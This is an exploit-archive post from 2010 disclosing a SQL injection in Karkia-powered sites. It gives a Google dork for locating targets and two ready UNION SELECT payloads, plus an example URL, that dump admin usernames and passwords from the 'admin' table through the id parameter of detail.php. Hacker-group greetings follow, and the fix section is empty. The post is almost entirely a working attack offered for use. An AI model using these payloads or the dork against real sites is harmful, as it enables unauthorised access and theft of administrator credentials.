Karkia SQL Injection Vulnerability

2010-06-22 20:50:24
Posted by: Net.Edit0r

#######################[In The Name Of God ]##########################
#Exploit Title : Karkia SQL Injection Vulnerability
#Author : Net.Edit0r
#Contact : [email protected]
#Location : Iran
Google dork : Powered by: Karkia.net
########################################################################
#
# [~]Vulnerable File
#
# ~~~ > id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin--
#
# ~~~ > id=-1+union+select+1,concat(user,0x3a,pass),3+from+admin--
#
# [~] Example
#
# http://127.0.0.1/detail.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin
#
########################################################################
#Greetz : Netqurd [M1] ~ Hitler
#Special Thanks : D3v1.BlackHat, M4hd1, Riden , B3hz4d
#Thanks 2 : ~[ CriMe ]~ , _R3v4l_ , † CoNstaNtine † , __l2o5v4__ ,
# : ~~XTerror~~ , _RAMESH_
#Note : IRANIAN HackerZ
########################################################################
#AttackerZ.IR ( Crazy Boys )
#Sun-army.Org (Iranian HacKerZ)
#Dark-tunnel.com (UnderGround Team)
#PHC.IR (Phc-Persian Hackerz Community)
#DevilzTM.Com (Devilztm Security Team)
###########################[Net.Edit0r]#################################

Fixes

No fixes

In order to submit a new fix you need to be registered.